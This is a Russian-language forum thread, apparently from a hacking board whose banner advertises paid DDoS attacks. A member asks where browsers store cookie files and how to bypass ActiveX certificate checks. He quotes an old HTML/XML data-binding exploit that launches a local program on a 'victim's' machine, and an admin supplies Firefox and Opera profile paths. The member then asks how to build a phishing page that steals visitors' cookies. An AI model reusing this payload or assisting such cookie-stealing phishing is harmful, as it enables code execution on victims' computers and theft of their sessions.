Перейти к содержимому

 Друзья: Всё для вебмастера | [ Реклама на форуме ]


Rutor
Rutor


[ DDos Услуги. DDos атака. Заказать ДДос ]


Кукиз, ActiveX


  • Авторизуйтесь для ответа в теме
Сообщений в теме: 4

#1
oler117

oler117

    Бит

  • Members
  • 34 сообщений
Драсте!.. :)  У меня 2 вопроса:
1) Напишите плиз по каким путям сохраняются файлы Cookies в Mozila, NetscapeNavigator, Opera.
2) Как обойти проверку сертификата ActiveX при загрузке страницы? Нашел только об уязвимости, которая позволяет запускать программы на ПК жертвы...

Цитата

Рассмотрим известный пример уязвимости найденной в марте 2002 года, и присутствующей практически во всех версиях операционных систем и браузеров:
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security><exploit><![CDATA[			 
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111"  codebase="c:/WINDOWS/calc.exe"></object>			 
]]></exploit></security>
</xml>
Данная уязвимость позволяет запускать любые программы на машине пользоваетля (если известен локальный путь к ним).


#2
$iD

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений

Цитата

1) Напишите плиз по каким путям сохраняются файлы Cookies в Mozila, NetscapeNavigator, Opera.
Firefox: Documents and Settings\имя_пользователя\Application Data\Mozilla\Firefox\Profiles\
Opera: Documents and Settings\имя_пользователя\Application Data\Opera\Opera\profile\

В Netscape не знаю.

#3
FreeCat

FreeCat

    Invisible Admin

  • root
  • PipPipPipPipPip
  • 1236 сообщений
$iD

Цитата

В Netscape не знаю.
Да примерно такой же путь  :) .

#4
oler117

oler117

    Бит

  • Members
  • 34 сообщений
Спс  :)   А как на счет 2-го вопроса?

#5
oler117

oler117

    Бит

  • Members
  • 34 сообщений
Понятно... :)  Ну тогда еще одно... Хочу создать фишинговую страницу, которая тырит кукиз у того, кто на нее зашел. Это возможно?


Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных